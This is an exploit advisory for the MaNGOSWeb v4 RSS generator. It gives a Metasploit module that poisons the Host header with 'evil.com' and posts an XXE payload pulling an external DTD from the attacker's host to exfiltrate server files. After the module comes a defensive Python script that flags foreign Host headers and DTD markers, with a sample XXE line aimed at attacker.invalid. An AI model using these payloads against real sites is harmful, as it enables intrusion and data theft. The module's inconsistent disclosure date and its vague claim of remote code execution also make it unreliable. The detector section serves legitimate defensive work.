MaNGOSWeb 4.0.6 Host Header Injection / XML Injection
=============================================================================================================================================
| # Title     : MaNGOSWeb V4 4.0.6 Host Header Injection + XXE                                                                               |
| # Author    : indoushka                                                                                                                   |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.2 (64 bits)                                                           |
| # Vendor    : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/rss.php                                                         |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478
[+] Summary : This module exploits multiple vulnerabilities in the MangosWeb v4 RSS generator (rss.php), including Host Header Injection (the feed's links are built from the client-supplied Host header), XXE in posted XML content, and a file write leading to RCE.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MangosWeb v4 RSS Multiple Vulnerabilities',
      'Description'    => %q{
        This module exploits multiple vulnerabilities in MangosWeb v4 RSS generator,
        including Host Header Injection, XXE, and file write leading to RCE.
      },
      'Author'         => [ 'indoushka' ],
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2017-6478' ],
        [ 'URL', 'http://mistvale.com' ]
      ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2024-01-01'
    ))

    register_options([
      OptString.new('TARGETURI',  [true,  'The base path to MangosWeb', '/']),
      OptString.new('HOSTHEADER', [false, 'Malicious host header', 'evil.com'])
    ])
  end

  # Fingerprint: an RSS document served from rss.php under the base path.
  def check
    uri = normalize_uri(target_uri.path, 'rss.php')
    res = send_request_cgi({ 'uri' => uri })
    if res && res.code == 200 && res.body.include?('<rss')
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    # Step 1: Host Header Injection to poison RSS
    print_status("Injecting malicious host header...")
    uri = normalize_uri(target_uri.path, 'rss.php')
    res = send_request_cgi({
      'uri'     => uri,
      'headers' => { 'Host' => datastore['HOSTHEADER'] }
    })

    # Step 2: XXE to read files
    print_status("Attempting XXE...")
    xxe_payload = %Q|<?xml version="1.0"?>
<!DOCTYPE rss [
<!ENTITY % remote SYSTEM "http://#{datastore['LHOST']}:#{datastore['LPORT']}/evil.dtd">
%remote;
%param;
%exfil;
]>|

    # Step 3: Execute payload
    print_status("Sending payload...")
    send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'index.php'),
      'vars_post' => {
        'title'     => 'Exploit',
        'message'   => xxe_payload,
        'posted_by' => Rex::Text.rand_text_alpha(10)
      }
    })

    handler
  end
end
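For defenders, the two request shapes the module above relies on are easy to spot in access logs or a WAF: a request to rss.php whose Host header is not one of the site's own virtual hosts, and a POST to index.php whose form fields carry DTD constructs (DOCTYPE, ENTITY declarations, external SYSTEM identifiers, parameter-entity references) that have no place in user-supplied forum text. The following triage script is an added example written for this page; it is not part of the advisory or of MaNGOSWeb. The hostnames in ALLOWED_HOSTS and the sample requests are constructed for illustration and should be replaced with your own.

```python
"""Triage MaNGOSWeb-style requests for Host poisoning and XXE markers (added example)."""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlencode

# Assumption: the virtual hosts this instance legitimately answers for.
ALLOWED_HOSTS = {"www.example.org", "example.org"}

# DTD constructs that should never appear in a forum post or RSS item body.
XXE_MARKERS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("doctype",            re.compile(r"<!DOCTYPE\b", re.I)),
    ("entity-decl",        re.compile(r"<!ENTITY\b", re.I)),
    ("external-system-id", re.compile(r"\bSYSTEM\s+[\"']", re.I)),
    ("param-entity-ref",   re.compile(r"%[A-Za-z_][\w.\-]*;")),
]

_PORT_SUFFIX = re.compile(r":\d+$")


def host_header_suspicious(host: str) -> bool:
    """True when the Host header (port stripped, case-folded) is not one of ours.

    rss.php builds absolute links from this header, so a foreign value means the
    generated feed would point subscribers at an attacker-chosen origin.
    """
    bare = _PORT_SUFFIX.sub("", host.strip().lower())
    return bare not in ALLOWED_HOSTS


def xxe_markers_in(text: str) -> List[str]:
    """Names of the DTD constructs present in a decoded form field value."""
    return [name for name, rx in XXE_MARKERS if rx.search(text)]


def triage(req: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one request (empty list = clean)."""
    findings: List[str] = []
    if req["path"].endswith("/rss.php") and host_header_suspicious(req.get("host", "")):
        findings.append(
            f"rss.php requested with unexpected Host '{req['host']}' (feed link poisoning)"
        )
    if req["method"] == "POST":
        fields = parse_qs(req.get("body", ""), keep_blank_values=True)
        for field, values in fields.items():
            for value in values:
                hits = xxe_markers_in(value)
                if hits:
                    findings.append(
                        f"DTD constructs in POST field '{field}': {', '.join(hits)}"
                    )
    return findings


# Constructed sample traffic: one clean feed fetch, one poisoned Host header,
# one benign post, one post carrying the kind of DTD the advisory describes.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"method": "GET", "path": "/rss.php", "host": "www.example.org:443", "body": ""},
    {"method": "GET", "path": "/rss.php", "host": "evil.example", "body": ""},
    {"method": "POST", "path": "/index.php", "host": "www.example.org",
     "body": urlencode({"title": "Hello", "message": "Just saying hi", "posted_by": "guest"})},
    {"method": "POST", "path": "/index.php", "host": "www.example.org",
     "body": urlencode({
         "title": "x",
         "message": '<?xml version="1.0"?><!DOCTYPE rss [<!ENTITY % remote SYSTEM '
                    '"http://attacker.invalid/x.dtd"> %remote;]>',
         "posted_by": "guest",
     })},
]


def run_report() -> Dict[int, List[str]]:
    """Triage every sample request; keyed by its index in SAMPLE_REQUESTS."""
    return {i: triage(r) for i, r in enumerate(SAMPLE_REQUESTS)}


if __name__ == "__main__":
    for idx, findings in run_report().items():
        print(idx, findings or "clean")
```

The Host check is intentionally an allowlist rather than a denylist: the fix on the application side is the same, namely to build feed URLs from a configured site address instead of `$_SERVER['HTTP_HOST']`. The DTD markers are a coarse screen, so route hits to a reviewer rather than blocking on them blindly; the durable fix is to parse user-supplied XML with external entity loading disabled.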
Greetings to :
===================================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================